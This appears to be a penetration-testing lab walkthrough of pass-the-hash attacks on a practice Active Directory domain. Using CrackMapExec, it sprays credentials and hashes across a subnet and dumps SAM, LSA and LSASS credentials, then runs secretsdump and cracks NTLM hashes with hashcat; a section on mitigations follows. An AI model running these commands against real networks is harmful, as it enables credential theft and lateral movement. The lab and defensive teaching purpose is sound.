Pass Attacks
Introduction
In cybersecurity, pass attacks exploit the authentication mechanisms of networked systems by using hash credentials rather than plaintext passwords. These attacks allow lateral movement within a network, often bypassing conventional security restrictions.
Methodology
Step 1: Initial Setup with CrackMapExec
CrackMapExec is a powerful post-exploitation tool for enumerating and exploiting Active Directory (AD) environments. First, we ensure that CrackMapExec is functioning correctly by viewing the available options:
crackmapexec --help

Step 2: Running SMB Commands
To explore SMB (Server Message Block) shares and services, we can start by listing the help options specific to SMB:
crackmapexec smb --help

We then connect to the network, specifying the target subnet and credentials. In this phase, we successfully obtain the credentials of the Punisher and Spiderman machines, allowing access to additional resources and revealing valuable information about other accessible systems on the network.
sudo crackmapexec smb 192.168.92.0/24 -u fcastle -d MARVEL.local -p Password1
The command uses CrackMapExec to scan the 192.168.92.0/24
subnet for SMB services. It attempts to authenticate with the username fcastle
and password Password1
on the domain MARVEL.local
. If successful, it enumerates SMB shares and gathers information about the devices in the network. This is typically used for network reconnaissance and SMB vulnerability testing during penetration testing.

Step 3: Testing Authentication with Hashes
We use the -H option to leverage hash-based authentication, which specifies NTLM hash values instead of plain-text passwords. This technique is crucial in pass-the-hash attacks, where plaintext passwords are unnecessary.
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth

Step 4: Enumerating SAM Accounts and Shares
SAM (Security Account Manager) databases and shared folders are common targets in network environments. Enumerating these allows us to view stored credentials and shared resources, providing insight into the network’s structure
SAM Enumeration
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth –sam

Shared Folders Enumeration
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth –shares

Step 5: Local Security Authority (LSA) Enumeration
The Local Security Authority (LSA) maintains various security policies and account information. Accessing it provides further credential-based access.
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth –lsa


Step 6: Listing All Available SMB Shares
We use the -L
option to enumerate SMB shares across the network. This step provides visibility into the shared resources accessible to the specified user, offering insight into sensitive data or high-privilege directories.
crackmapexec smb -L


Step 7: Running LSASSY Module
Lsassy is an extraction tool that works alongside CrackMapExec to dump credentials from the Local Security Authority Subsystem Service (LSASS).
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth -M lsassy

Step 8: Database Enumeration and Switch to CMEDB
We switch to CMEDB, CrackMapExec’s integrated database module to manage and review data on extracted hosts. This module allows us to view host details and extracted data.
Enter CMEDB
cmedb

Check Hosts and Shares
hosts

Shares

Dumping and Cracking Hashes with Secrets Dump
SecretsDump is utilized to retrieve hashed credentials from systems, providing direct access to SAM hashes.
Dumping Hashes with Credentials
secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.92.128

2. Using Alternate Credentials
secretsdump.py MARVEL.local/pparker:'Password1'@192.168.92.137

3. Dumping Hashes with a Provided Hash
secretsdump.py administrator@192.168.92.128 -hashes <hash>

Cracking Retrieved Hashes with Hashcat
Once hashes are extracted, we proceed with cracking them to reveal passwords. After creating a file for the hashes:
· Create a Hash File
mousepad ntlm.txt

Then, paste the copied hash into this file.

· Verify NTLM Hash Format
hashcat --help | grep NTLM

· Crack Hashes with Hashcat
hashcat -m 1000 ntlm.txt rockyou.txt
hashcat: This is the tool used for high-performance password cracking. Hashcat supports various hashing algorithms and allows us to perform dictionary, brute-force, and hybrid attacks.
-m 1000: The
-m
option specifies the hashing algorithm. In this case,1000
is the mode identifier for NTLM hashes. NTLM is a hash format used mainly by Windows operating systems to store password hashes. The mode1000
tells Hashcat that the hashes in the filentlm.txt
are NTLM hashes and to use the appropriate algorithm.ntlm.txt: This is the input file containing the NTLM hashes to be cracked.
rockyou.txt: This is the wordlist or dictionary file used by Hashcat to attempt cracking the hashes.


Mitigations
Pass the Hash / Pass the Password
While it is challenging to fully prevent pass attacks, several mitigations can significantly raise the difficulty for attackers:
Limit Account Re-use
o Unique Passwords for Each Local Administrator Account: Avoid re-using the same password across different local administrator accounts.
o Disable Guest and Built-In Administrator Accounts: Disabling these accounts reduces attack entry points, as they are often default targets.
o Apply the Principle of Least Privilege: Restrict local administrator rights to only essential personnel and systems to minimize the risk and impact of an account being compromised.
2. Utilize Strong Passwords
o Enforce Long and Complex Passwords: Require passwords longer than 14 characters with a mix of upper and lower case letters, numbers, and symbols. Stronger passwords increase the difficulty of successful brute force and pass-the-hash attacks.
3. Multi-Factor Authentication (MFA)
o Adding MFA, especially for privileged accounts, greatly enhances security by requiring additional verification steps beyond just the password or hash.
4. Network Segmentation and Isolation
o Separate High-Risk and Critical Systems: Segment the network so that high-value assets, such as domain controllers and critical servers, are isolated from other network zones. This restricts lateral movement if one account or machine is compromised.
Last updated